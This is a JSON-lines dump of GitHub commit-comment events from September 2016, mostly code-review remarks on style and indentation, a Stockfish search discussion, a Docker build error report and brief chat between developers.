{"id":"4612305939","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"c14006078/phonebook-1"},"payload":{"comment":{"id":19157479,"position":16,"line":15,"path":"phonebook_opt.c","commit_id":"93ec8878cbfbb0fe8dcf990cae536c1d95afb4e8","created_at":"2016-09-24T10:10:42Z","updated_at":"2016-09-24T10:10:42Z","body":"You have to follow the consistent coding style. Read the instructions of assignment about `astyle` carefully."}},"created_at":"2016-09-24T10:10:42Z"}
{"id":"4612306414","type":"CommitCommentEvent","actor":{"login":"ketul-shah"},"repo":{"name":"ketul-shah/hello-world"},"payload":{"comment":{"id":19157481,"position":null,"line":null,"path":null,"commit_id":"61bc5cbc1128331699bc0ddf14bb56ed955e83bf","created_at":"2016-09-24T10:11:05Z","updated_at":"2016-09-24T10:11:05Z","body":"this looks good. bakchodi bandh. and i'll merge this to the master."}},"created_at":"2016-09-24T10:11:05Z"}
{"id":"4612306806","type":"CommitCommentEvent","actor":{"login":"AlexLartsev19"},"repo":{"name":"opengapps/opengapps"},"payload":{"comment":{"id":19157482,"position":null,"line":null,"path":null,"commit_id":"afa8148adfdae0fdf8348f095249142a8f8aefa0","created_at":"2016-09-24T10:11:28Z","updated_at":"2016-09-24T10:11:28Z","body":"Sorry :("}},"created_at":"2016-09-24T10:11:28Z"}
{"id":"4612307816","type":"CommitCommentEvent","actor":{"login":"mfonville"},"repo":{"name":"opengapps/opengapps"},"payload":{"comment":{"id":19157483,"position":null,"line":null,"path":null,"commit_id":"afa8148adfdae0fdf8348f095249142a8f8aefa0","created_at":"2016-09-24T10:12:24Z","updated_at":"2016-09-24T10:12:24Z","body":"no problem. You can't make an omelette without breaking eggs"}},"created_at":"2016-09-24T10:12:24Z"}
{"id":"4612308273","type":"CommitCommentEvent","actor":{"login":"AlexLartsev19"},"repo":{"name":"opengapps/opengapps"},"payload":{"comment":{"id":19157485,"position":null,"line":null,"path":null,"commit_id":"afa8148adfdae0fdf8348f095249142a8f8aefa0","created_at":"2016-09-24T10:12:51Z","updated_at":"2016-09-24T10:12:51Z","body":"Yes :D"}},"created_at":"2016-09-24T10:12:51Z"}
{"id":"4612313680","type":"CommitCommentEvent","actor":{"login":"monibu1548"},"repo":{"name":"All-door/Artik_internal_controller"},"payload":{"comment":{"id":19157486,"position":null,"line":null,"path":null,"commit_id":"44e26d1695b5cfcd73d10aeb8d1f91614c8d1694","created_at":"2016-09-24T10:17:44Z","updated_at":"2016-09-24T10:17:44Z","body":"하나 더!\r\n\r\n인덴트! 는 띄어쓰기 4칸입니다.\r\n\r\n현재 다 8칸으로 되어있는거같아요. 수정해주세요"}},"created_at":"2016-09-24T10:17:44Z"}
{"id":"4612317020","type":"CommitCommentEvent","actor":{"login":"Simn"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19157490,"position":null,"line":null,"path":null,"commit_id":"4e0345e7734f8e9810d5f03f69e75e13a615ddb5","created_at":"2016-09-24T10:20:35Z","updated_at":"2016-09-24T10:20:35Z","body":"Any reason you're not making this class extern?"}},"created_at":"2016-09-24T10:20:35Z"}
{"id":"4612319510","type":"CommitCommentEvent","actor":{"login":"nodeworks"},"repo":{"name":"nodeworks/formaturl"},"payload":{"comment":{"id":19157493,"position":null,"line":null,"path":null,"commit_id":"374d79da9ed269d4fed408bd142b79124a1f48a8","created_at":"2016-09-24T10:22:34Z","updated_at":"2016-09-24T10:22:34Z","body":"test"}},"created_at":"2016-09-24T10:22:34Z"}
{"id":"4612320784","type":"CommitCommentEvent","actor":{"login":"wild46cat"},"repo":{"name":"wild46cat/helloworld"},"payload":{"comment":{"id":19157496,"position":null,"line":null,"path":null,"commit_id":"eabea4d94d12759ba8e621d8676a540287d98968","created_at":"2016-09-24T10:23:43Z","updated_at":"2016-09-24T10:23:43Z","body":"i think it's ok"}},"created_at":"2016-09-24T10:23:43Z"}
{"id":"4612321777","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"tomomiik/achieve"},"payload":{"comment":{"id":19157497,"position":22,"line":22,"path":"app/controllers/blogs_controller.rb","commit_id":"011161dcd6837f0a4447a7e048efc27ef395fe8d","created_at":"2016-09-24T10:24:27Z","updated_at":"2016-09-24T10:24:27Z","body":"ここは空行を入れましょう。\r\nhttps://shugo.net/ruby-codeconv/codeconv.html"}},"created_at":"2016-09-24T10:24:27Z"}
{"id":"4612321920","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"tomomiik/achieve"},"payload":{"comment":{"id":19157498,"position":24,"line":24,"path":"app/controllers/blogs_controller.rb","commit_id":"011161dcd6837f0a4447a7e048efc27ef395fe8d","created_at":"2016-09-24T10:24:35Z","updated_at":"2016-09-24T10:24:35Z","body":"ここも空行をーー。\r\nhttps://shugo.net/ruby-codeconv/codeconv.html"}},"created_at":"2016-09-24T10:24:35Z"}
{"id":"4612322087","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"tomomiik/achieve"},"payload":{"comment":{"id":19157499,"position":31,"line":31,"path":"app/controllers/blogs_controller.rb","commit_id":"011161dcd6837f0a4447a7e048efc27ef395fe8d","created_at":"2016-09-24T10:24:41Z","updated_at":"2016-09-24T10:24:41Z","body":"ここもです。\r\nhttps://shugo.net/ruby-codeconv/codeconv.html"}},"created_at":"2016-09-24T10:24:41Z"}
{"id":"4612322282","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"tomomiik/achieve"},"payload":{"comment":{"id":19157500,"position":35,"line":35,"path":"app/controllers/blogs_controller.rb","commit_id":"011161dcd6837f0a4447a7e048efc27ef395fe8d","created_at":"2016-09-24T10:24:51Z","updated_at":"2016-09-24T10:24:51Z","body":"ここもですね。\r\n詰めてはいけません。\r\nhttps://shugo.net/ruby-codeconv/codeconv.html"}},"created_at":"2016-09-24T10:24:51Z"}
{"id":"4612322397","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"tomomiik/achieve"},"payload":{"comment":{"id":19157501,"position":39,"line":39,"path":"app/controllers/blogs_controller.rb","commit_id":"011161dcd6837f0a4447a7e048efc27ef395fe8d","created_at":"2016-09-24T10:24:57Z","updated_at":"2016-09-24T10:24:57Z","body":"ここも開けてください。"}},"created_at":"2016-09-24T10:24:57Z"}
{"id":"4612322680","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"tomomiik/achieve"},"payload":{"comment":{"id":19157502,"position":40,"line":40,"path":"app/controllers/blogs_controller.rb","commit_id":"011161dcd6837f0a4447a7e048efc27ef395fe8d","created_at":"2016-09-24T10:25:09Z","updated_at":"2016-09-24T10:25:09Z","body":"ここは、インデントを追加です。\r\nhttps://shugo.net/ruby-codeconv/codeconv.html"}},"created_at":"2016-09-24T10:25:09Z"}
{"id":"4612322820","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"tomomiik/achieve"},"payload":{"comment":{"id":19157503,"position":43,"line":43,"path":"app/controllers/blogs_controller.rb","commit_id":"011161dcd6837f0a4447a7e048efc27ef395fe8d","created_at":"2016-09-24T10:25:16Z","updated_at":"2016-09-24T10:25:16Z","body":"空行をーー。\r\nhttps://shugo.net/ruby-codeconv/codeconv.html"}},"created_at":"2016-09-24T10:25:16Z"}
{"id":"4612323110","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"tomomiik/achieve"},"payload":{"comment":{"id":19157504,"position":9,"line":9,"path":"app/controllers/contacts_controller.rb","commit_id":"011161dcd6837f0a4447a7e048efc27ef395fe8d","created_at":"2016-09-24T10:25:32Z","updated_at":"2016-09-24T10:25:32Z","body":"詰めるのはあまりやらない書き方です。\r\nhttps://shugo.net/ruby-codeconv/codeconv.html"}},"created_at":"2016-09-24T10:25:32Z"}
{"id":"4612323352","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"tomomiik/achieve"},"payload":{"comment":{"id":19157506,"position":12,"line":12,"path":"app/controllers/contacts_controller.rb","commit_id":"011161dcd6837f0a4447a7e048efc27ef395fe8d","created_at":"2016-09-24T10:25:47Z","updated_at":"2016-09-24T10:25:47Z","body":"if文の中は、インデントです。\r\nhttps://shugo.net/ruby-codeconv/codeconv.html"}},"created_at":"2016-09-24T10:25:47Z"}
{"id":"4612323463","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"tomomiik/achieve"},"payload":{"comment":{"id":19157507,"position":17,"line":17,"path":"app/controllers/contacts_controller.rb","commit_id":"011161dcd6837f0a4447a7e048efc27ef395fe8d","created_at":"2016-09-24T10:25:54Z","updated_at":"2016-09-24T10:25:54Z","body":"空行をーー。\r\nhttps://shugo.net/ruby-codeconv/codeconv.html"}},"created_at":"2016-09-24T10:25:54Z"}
{"id":"4612323584","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"tomomiik/achieve"},"payload":{"comment":{"id":19157508,"position":21,"line":21,"path":"app/controllers/contacts_controller.rb","commit_id":"011161dcd6837f0a4447a7e048efc27ef395fe8d","created_at":"2016-09-24T10:25:59Z","updated_at":"2016-09-24T10:25:59Z","body":"空行をーー。\r\nhttps://shugo.net/ruby-codeconv/codeconv.html\r\n"}},"created_at":"2016-09-24T10:25:59Z"}
{"id":"4612324009","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"tomomiik/achieve"},"payload":{"comment":{"id":19157509,"position":2,"line":2,"path":"app/helpers/blogs_helper.rb","commit_id":"011161dcd6837f0a4447a7e048efc27ef395fe8d","created_at":"2016-09-24T10:26:20Z","updated_at":"2016-09-24T10:26:20Z","body":"インデントが深すぎますーー。\r\n2スペース分です。\r\nhttps://shugo.net/ruby-codeconv/codeconv.html"}},"created_at":"2016-09-24T10:26:20Z"}
{"id":"4612324172","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"tomomiik/achieve"},"payload":{"comment":{"id":19157510,"position":2,"line":2,"path":"app/models/blog.rb","commit_id":"011161dcd6837f0a4447a7e048efc27ef395fe8d","created_at":"2016-09-24T10:26:30Z","updated_at":"2016-09-24T10:26:30Z","body":"インデントが深いですね。\r\nhttps://shugo.net/ruby-codeconv/codeconv.html"}},"created_at":"2016-09-24T10:26:30Z"}
{"id":"4612324331","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"tomomiik/achieve"},"payload":{"comment":{"id":19157511,"position":2,"line":2,"path":"app/models/contact.rb","commit_id":"011161dcd6837f0a4447a7e048efc27ef395fe8d","created_at":"2016-09-24T10:26:38Z","updated_at":"2016-09-24T10:26:38Z","body":"ここもインデントが深いです。\r\nhttps://shugo.net/ruby-codeconv/codeconv.html"}},"created_at":"2016-09-24T10:26:38Z"}
{"id":"4612324357","type":"CommitCommentEvent","actor":{"login":"MichalStempler"},"repo":{"name":"MichalStempler/datasciencecoursera2"},"payload":{"comment":{"id":19157513,"position":null,"line":null,"path":null,"commit_id":"8df65f6496ca64134fba375dcfd84b3b827a9cb2","created_at":"2016-09-24T10:26:40Z","updated_at":"2016-09-24T10:26:40Z","body":"I did not make any changes. just trying to push the DataSharing repo to my own github as a Coursera assignment"}},"created_at":"2016-09-24T10:26:40Z"}
{"id":"4612325048","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"tomomiik/achieve"},"payload":{"comment":{"id":19157514,"position":4,"line":4,"path":"app/views/contacts/new.html.erb","commit_id":"011161dcd6837f0a4447a7e048efc27ef395fe8d","created_at":"2016-09-24T10:27:10Z","updated_at":"2016-09-24T10:27:10Z","body":"ここはdivの中なのでインデントをーー。"}},"created_at":"2016-09-24T10:27:10Z"}
{"id":"4612325149","type":"CommitCommentEvent","actor":{"login":"monsta"},"repo":{"name":"mate-desktop/mate-applets"},"payload":{"comment":{"id":19157515,"position":null,"line":null,"path":null,"commit_id":"a708224decae0f7417aa38b926318fa32747b161","created_at":"2016-09-24T10:27:15Z","updated_at":"2016-09-24T10:27:15Z","body":"Dammit. Just as I suspected in https://github.com/mate-desktop/mate-applets/pull/194#issuecomment-224873280. We still don't have libcpupower in Ubuntu, and I suspected we'll have problems with that patch when using libcpufreq. :disappointed: "}},"created_at":"2016-09-24T10:27:15Z"}
{"id":"4612325184","type":"CommitCommentEvent","actor":{"login":"kivikakk"},"repo":{"name":"kivikakk/ifsexplorer"},"payload":{"comment":{"id":19157516,"position":null,"line":null,"path":null,"commit_id":"f1095ad2c73d2ebc7ffcf64933bf7d5b5e6106a5","created_at":"2016-09-24T10:27:17Z","updated_at":"2016-09-24T10:27:17Z","body":"Do you need to adjust the size factor at the top? There's no way to automatically determine the dimensions of the image, so that has to be done manually."}},"created_at":"2016-09-24T10:27:17Z"}
{"id":"4612325460","type":"CommitCommentEvent","actor":{"login":"vilhelmfl"},"repo":{"name":"Oscaro947/Lorenskog-Skihall"},"payload":{"comment":{"id":19157517,"position":null,"line":null,"path":null,"commit_id":"4659544462f9cd2e7068f7a9824082e0ce1abb7b","created_at":"2016-09-24T10:27:34Z","updated_at":"2016-09-24T10:27:34Z","body":"et hei"}},"created_at":"2016-09-24T10:27:34Z"}
{"id":"4612326014","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"tomomiik/achieve"},"payload":{"comment":{"id":19157518,"position":null,"line":null,"path":null,"commit_id":"011161dcd6837f0a4447a7e048efc27ef395fe8d","created_at":"2016-09-24T10:28:04Z","updated_at":"2016-09-24T10:28:04Z","body":"@tomomiik 一通り、コードレビューしておきました。\r\nコーディング規約を意識した記述を今後はお願いしますーー。\r\nhttps://shugo.net/ruby-codeconv/codeconv.html"}},"created_at":"2016-09-24T10:28:04Z"}
{"id":"4612327748","type":"CommitCommentEvent","actor":{"login":"schart"},"repo":{"name":"schart/proj_code"},"payload":{"comment":{"id":19157520,"position":null,"line":null,"path":null,"commit_id":"d46b468735452f517b206d648e8aa3b2a40f8f04","created_at":"2016-09-24T10:29:37Z","updated_at":"2016-09-24T10:29:37Z","body":"Beautiful!"}},"created_at":"2016-09-24T10:29:37Z"}
{"id":"4612328418","type":"CommitCommentEvent","actor":{"login":"clairscent"},"repo":{"name":"waigani/codelingo_demo"},"payload":{"comment":{"id":19157522,"position":null,"line":null,"path":null,"commit_id":"f917d6c31b995375020b3074dd3fc896504b425c","created_at":"2016-09-24T10:30:12Z","updated_at":"2016-09-24T10:30:12Z","body":"overall comment"}},"created_at":"2016-09-24T10:30:12Z"}
{"id":"4612329701","type":"CommitCommentEvent","actor":{"login":"pereligins"},"repo":{"name":"pereligins/project1"},"payload":{"comment":{"id":19157523,"position":null,"line":null,"path":null,"commit_id":"ac4baa88ce252b2be631e54bc8a847e204554195","created_at":"2016-09-24T10:31:16Z","updated_at":"2016-09-24T10:31:16Z","body":"This is my first edit for try"}},"created_at":"2016-09-24T10:31:16Z"}
{"id":"4612329786","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19157524,"position":44,"line":41,"path":"issue18/login.php","commit_id":"df1870cffc8c2485d010c23815a4261ceb1ceab1","created_at":"2016-09-24T10:31:21Z","updated_at":"2016-09-24T10:31:21Z","body":"上記のように修正したところ、認証されるようになりました！\r\npassword_verifyだとなぜ先程のコードで行けないのでしょうか。"}},"created_at":"2016-09-24T10:31:21Z"}
{"id":"4612336960","type":"CommitCommentEvent","actor":{"login":"DiieH"},"repo":{"name":"Ar1i/PokemonGo-Bot"},"payload":{"comment":{"id":19157528,"position":null,"line":null,"path":null,"commit_id":"0d62d09e32e9df61c2c0784349e1049af395c9b2","created_at":"2016-09-24T10:37:42Z","updated_at":"2016-09-24T10:37:42Z","body":"Hi.\r\ni cant start the bot .. \r\nidk why. look of this screenshot.\r\n![image](https://cloud.githubusercontent.com/assets/22412419/18807902/a8fccfe0-8253-11e6-9f42-d3f5709a504b.png)\r\n"}},"created_at":"2016-09-24T10:37:42Z"}
{"id":"4612340371","type":"CommitCommentEvent","actor":{"login":"szepeviktor"},"repo":{"name":"lamby/travis.debian.net"},"payload":{"comment":{"id":19157530,"position":null,"line":null,"path":null,"commit_id":"eb6e8400a86a88727a2c068923481285bf2690c4","created_at":"2016-09-24T10:40:41Z","updated_at":"2016-09-24T10:40:41Z","body":"Hello @lamby !\r\n\r\nI use this type of shell headers: https://github.com/szepeviktor/debian-server-tools/blob/master/package/README.md#script-meta"}},"created_at":"2016-09-24T10:40:41Z"}
{"id":"4612340448","type":"CommitCommentEvent","actor":{"login":"haha19890801"},"repo":{"name":"haha19890801/PokeBack"},"payload":{"comment":{"id":19157531,"position":null,"line":null,"path":null,"commit_id":"8bcf7d3f8666e41aa7c9b2a464873dea6010524d","created_at":"2016-09-24T10:40:45Z","updated_at":"2016-09-24T10:40:45Z","body":"抱歉我第一次使用!能否給我次機會重新下載!拜託你了~"}},"created_at":"2016-09-24T10:40:45Z"}
{"id":"4612340928","type":"CommitCommentEvent","actor":{"login":"mcostalba"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19157532,"position":null,"line":null,"path":null,"commit_id":"9607d25e1f110f25cad39363daf16bb346afd522","created_at":"2016-09-24T10:41:10Z","updated_at":"2016-09-24T10:41:10Z","body":"@snicolet Why we should check for this? SEE does not enforce any check on legality and actually can and is called with illegal moves: this should not be a problem."}},"created_at":"2016-09-24T10:41:10Z"}
{"id":"4612341321","type":"CommitCommentEvent","actor":{"login":"Hopje"},"repo":{"name":"docker/example-voting-app"},"payload":{"comment":{"id":19157533,"position":null,"line":null,"path":null,"commit_id":"53796441698b6de4b7420dd69fa1e8a5565e7e4a","created_at":"2016-09-24T10:41:32Z","updated_at":"2016-09-24T10:41:32Z","body":"This update on Dockerfile results in an error \"dotnet: not found\". Without the update, everything works fine.\r\nError detail:\r\n$docker-compose up\r\n...\r\nStep 4 : RUN dotnet restore -v minimal src/     && dotnet publish -c Release -o ./ src/Worker/     && rm -rf src/ $HOME/.nuget/\r\n ---> Running in 7c37c11291b2\r\n/bin/sh: 1: dotnet: not found\r\nERROR: Service 'worker' failed to build: The command '/bin/sh -c dotnet restore -v minimal src/     && dotnet publish -c Release -o ./ src/Worker/     && rm -rf src/ $HOME/.nuget/' returned a non-zero code: 127\r\n"}},"created_at":"2016-09-24T10:41:32Z"}
{"id":"4612342628","type":"CommitCommentEvent","actor":{"login":"codenigma"},"repo":{"name":"mbrlabs/Mundus"},"payload":{"comment":{"id":19157534,"position":null,"line":null,"path":null,"commit_id":"a158450ab96e6c51d909211da6c8276968bd1fba","created_at":"2016-09-24T10:42:44Z","updated_at":"2016-09-24T10:42:44Z","body":"fixed issue #8 \r\nadding empty, terrain now with correct update\r\nremoving nodes, ok now"}},"created_at":"2016-09-24T10:42:44Z"}
{"id":"4612342679","type":"CommitCommentEvent","actor":{"login":"lamby"},"repo":{"name":"lamby/travis.debian.net"},"payload":{"comment":{"id":19157535,"position":null,"line":null,"path":null,"commit_id":"eb6e8400a86a88727a2c068923481285bf2690c4","created_at":"2016-09-24T10:42:47Z","updated_at":"2016-09-24T10:42:47Z","body":"Thanks, but could you clarify the advantages over what is currently there?"}},"created_at":"2016-09-24T10:42:47Z"}
{"id":"4612344646","type":"CommitCommentEvent","actor":{"login":"pb00067"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19157536,"position":null,"line":null,"path":null,"commit_id":"d394cf210e392fd5e433cb9a89495641f3acaccc","created_at":"2016-09-24T10:44:37Z","updated_at":"2016-09-24T10:44:37Z","body":"@snicolet One thing is interesting in this test series so far: for performing good at STC it seems important to skip the tricky/costly discoverings to recognize (= pawn- and king-moves) whilst for LTC it appears to be exacly the contrary. It is also understandable since in endgames the pieces that more and more prevail are indeed pawns and kings. Seems that the key to make this work is to recognize more effectively and fast this pawn-king discovering checks -moves."}},"created_at":"2016-09-24T10:44:37Z"}
{"id":"4612346685","type":"CommitCommentEvent","actor":{"login":"fanliming"},"repo":{"name":"markdalgleish/react-static-site-playground"},"payload":{"comment":{"id":19157537,"position":null,"line":null,"path":null,"commit_id":"7ed3de414605a432f9994fa4503bdd32bb5d0ce7","created_at":"2016-09-24T10:46:31Z","updated_at":"2016-09-24T10:46:31Z","body":"I like it"}},"created_at":"2016-09-24T10:46:31Z"}
{"id":"4612347400","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"winnie148636/phonebook"},"payload":{"comment":{"id":19157538,"position":null,"line":null,"path":null,"commit_id":"58afeb6807b993593840d037aa208131d1c671cb","created_at":"2016-09-24T10:47:09Z","updated_at":"2016-09-24T10:47:09Z","body":"Write down meaningful GIT commit messages. Read this article carefully: http://chris.beams.io/posts/git-commit/"}},"created_at":"2016-09-24T10:47:09Z"}
{"id":"4612348780","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19157539,"position":null,"line":null,"path":null,"commit_id":"9607d25e1f110f25cad39363daf16bb346afd522","created_at":"2016-09-24T10:48:27Z","updated_at":"2016-09-24T10:48:27Z","body":"@mcostalba Because the current SF is dependent of the SEE values given for illegal moves. Our pruning strategies in search depends on how many illegal moves we generates in MovePicker, and what SEE values we give to these illegal moves."}},"created_at":"2016-09-24T10:48:27Z"}
{"id":"4612348995","type":"CommitCommentEvent","actor":{"login":"jserv"},"repo":{"name":"winnie148636/phonebook"},"payload":{"comment":{"id":19157540,"position":19,"line":22,"path":"phonebook_opt.h","commit_id":"e99529a24440f443dc4aa1cdbc5d6fe4b580de1d","created_at":"2016-09-24T10:48:41Z","updated_at":"2016-09-24T10:48:41Z","body":"Don't leave the extra blank line."}},"created_at":"2016-09-24T10:48:41Z"}
{"id":"4612349377","type":"CommitCommentEvent","actor":{"login":"kunagpal"},"repo":{"name":"IEEECS-VIT/GPL"},"payload":{"comment":{"id":19157541,"position":null,"line":null,"path":null,"commit_id":"f0bf4f9a9a576e7aad01bcd581c51303b1e68682","created_at":"2016-09-24T10:49:06Z","updated_at":"2016-09-24T10:49:06Z","body":":+1:\r\n"}},"created_at":"2016-09-24T10:49:06Z"}
{"id":"4612349618","type":"CommitCommentEvent","actor":{"login":"ron666"},"repo":{"name":"jalios/mediaelement"},"payload":{"comment":{"id":19157542,"position":null,"line":null,"path":null,"commit_id":"b0f2abfa29f1780427d118d523014a6ec076dad0","created_at":"2016-09-24T10:49:18Z","updated_at":"2016-09-24T10:49:18Z","body":"@OlivierJaquemet In the `demo` folder there's one file named `mediaelementplayer-translation.html`. Add the new translations at the head, add the prefixes in the dropdown menu in that file, and in the player configuration just add all the features that contain translatable elements (fullscreen, sourcechooser, speed, etc.). Like this:\r\n```javascript\r\n $('audio,video').mediaelementplayer({\r\n     features: ['playpause','progress','volume', 'speed', 'sourcechooser', fullscreen],\r\n     success: function() {\r\n         ...\r\n    }\r\n});\r\n```"}},"created_at":"2016-09-24T10:49:18Z"}
{"id":"4612349737","type":"CommitCommentEvent","actor":{"login":"vijayamaddala"},"repo":{"name":"vijayamaddala/UCSDUnfoldingMaps"},"payload":{"comment":{"id":19157543,"position":6,"line":6,"path":"data/sortAndPrint.test2.out.txt","commit_id":"aafade88a3a1f575e63870595bb2e70f9e3ad2fb","created_at":"2016-09-24T10:49:25Z","updated_at":"2016-09-24T10:49:25Z","body":"6th largest magnitude\r\n"}},"created_at":"2016-09-24T10:49:25Z"}
{"id":"4612349878","type":"CommitCommentEvent","actor":{"login":"szepeviktor"},"repo":{"name":"lamby/travis.debian.net"},"payload":{"comment":{"id":19157544,"position":null,"line":null,"path":null,"commit_id":"eb6e8400a86a88727a2c068923481285bf2690c4","created_at":"2016-09-24T10:49:33Z","updated_at":"2016-09-24T10:49:33Z","body":"- has a lot of data\r\n- simple\r\n- uniform\r\n- parsable\r\n"}},"created_at":"2016-09-24T10:49:33Z"}
{"id":"4612351579","type":"CommitCommentEvent","actor":{"login":"hugomano"},"repo":{"name":"arnaudlevy/mystudents"},"payload":{"comment":{"id":19157546,"position":null,"line":null,"path":null,"commit_id":"ae7440361507bfcbf4b5329d09a5e0abec183ea8","created_at":"2016-09-24T10:51:09Z","updated_at":"2016-09-24T10:51:09Z","body":"Sympa le programme !"}},"created_at":"2016-09-24T10:51:09Z"}
{"id":"4612352102","type":"CommitCommentEvent","actor":{"login":"lamby"},"repo":{"name":"lamby/travis.debian.net"},"payload":{"comment":{"id":19157548,"position":null,"line":null,"path":null,"commit_id":"eb6e8400a86a88727a2c068923481285bf2690c4","created_at":"2016-09-24T10:51:38Z","updated_at":"2016-09-24T10:51:38Z","body":"I think I'd rather have everything canonically documented on the HTML page to avoid duplication. Anyway, thanks :)"}},"created_at":"2016-09-24T10:51:38Z"}
{"id":"4612352495","type":"CommitCommentEvent","actor":{"login":"haha19890801"},"repo":{"name":"synman/PokeBack"},"payload":{"comment":{"id":19157549,"position":null,"line":null,"path":null,"commit_id":"8bcf7d3f8666e41aa7c9b2a464873dea6010524d","created_at":"2016-09-24T10:51:57Z","updated_at":"2016-09-24T10:51:57Z","body":"不好意思，不是故意的，我不會用。"}},"created_at":"2016-09-24T10:51:57Z"}
{"id":"4612354446","type":"CommitCommentEvent","actor":{"login":"noelkalel"},"repo":{"name":"noelkalel/smallProject"},"payload":{"comment":{"id":19157551,"position":null,"line":null,"path":null,"commit_id":"931430b0d9ef7045f15372f9d34fd4b843737ff8","created_at":"2016-09-24T10:53:27Z","updated_at":"2016-09-24T10:53:27Z","body":"admin"}},"created_at":"2016-09-24T10:53:27Z"}
{"id":"4612354945","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19157552,"position":null,"line":null,"path":null,"commit_id":"d394cf210e392fd5e433cb9a89495641f3acaccc","created_at":"2016-09-24T10:53:53Z","updated_at":"2016-09-24T10:53:53Z","body":"Another way to interpret the results of the tests is that maybe it's detrimental to spend too much time to shrink the initial stmAttackers for the defense in case the critical move m is a discovered check itself (in fact we have never tested any version *without* line 1019, maybe it's better to just suppress them)."}},"created_at":"2016-09-24T10:53:53Z"}
{"id":"4612355071","type":"CommitCommentEvent","actor":{"login":"clairscent"},"repo":{"name":"waigani/codelingo_demo"},"payload":{"comment":{"id":19157553,"position":null,"line":null,"path":null,"commit_id":"f917d6c31b995375020b3074dd3fc896504b425c","created_at":"2016-09-24T10:53:58Z","updated_at":"2016-09-24T10:53:58Z","body":"overall comment"}},"created_at":"2016-09-24T10:53:58Z"}
{"id":"4612355240","type":"CommitCommentEvent","actor":{"login":"clairscent"},"repo":{"name":"waigani/codelingo_demo"},"payload":{"comment":{"id":19157554,"position":null,"line":null,"path":null,"commit_id":"f917d6c31b995375020b3074dd3fc896504b425c","created_at":"2016-09-24T10:54:08Z","updated_at":"2016-09-24T10:54:08Z","body":"overall comment"}},"created_at":"2016-09-24T10:54:08Z"}
{"id":"4612360599","type":"CommitCommentEvent","actor":{"login":"br3w0r"},"repo":{"name":"br3w0r/studying"},"payload":{"comment":{"id":19157560,"position":null,"line":null,"path":null,"commit_id":"c37c3c91e2df37026ea8e145d9a9a18c75648871","created_at":"2016-09-24T10:58:38Z","updated_at":"2016-09-24T10:58:38Z","body":"You shouldn't use this code till its version < 0.1."}},"created_at":"2016-09-24T10:58:38Z"}
{"id":"4612360834","type":"CommitCommentEvent","actor":{"login":"canofworms"},"repo":{"name":"crawl/crawl"},"payload":{"comment":{"id":19157561,"position":null,"line":null,"path":null,"commit_id":"942d50d9dfe256898701c78408925d0771672727","created_at":"2016-09-24T10:58:51Z","updated_at":"2016-09-24T10:58:51Z","body":"Whoops, didn't notice that I needed to linebreak it manually..."}},"created_at":"2016-09-24T10:58:51Z"}
{"id":"4612361420","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19157562,"position":null,"line":null,"path":null,"commit_id":"b070f84928de1d91be8fac5c451fd3cf9e2ff41c","created_at":"2016-09-24T10:59:29Z","updated_at":"2016-09-24T10:59:29Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 268](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1232&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-24T10:59:29Z"}
{"id":"4612362804","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":19157564,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-24T11:00:32Z","updated_at":"2016-09-24T11:00:32Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.178](http://build.clear-measure.com/viewLog.html?buildId=10689&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) is now running\n"}},"created_at":"2016-09-24T11:00:32Z"}
{"id":"4612364346","type":"CommitCommentEvent","actor":{"login":"francois-berder"},"repo":{"name":"francois-berder/LetMeCreate"},"payload":{"comment":{"id":19157568,"position":113,"line":154,"path":"src/click/alphanum.c","commit_id":"4077f55c179c4926ce2d0861800a8d15dda4cab1","created_at":"2016-09-24T11:01:51Z","updated_at":"2016-09-24T11:01:51Z","body":"That is good but quite long for initialiasing three gpios. I use this style in other places:\r\n```c\r\nif (gpio_init(gpio_pin_le2) < 0\r\n||  gpio_init(gpio_pin_oe) < 0\r\n||  gpio_init(gpio_pin_oe2) < 0) {\r\n    // error message\r\n    return -1\r\n}\r\n```\r\n\r\nIt is much more compact."}},"created_at":"2016-09-24T11:01:51Z"}
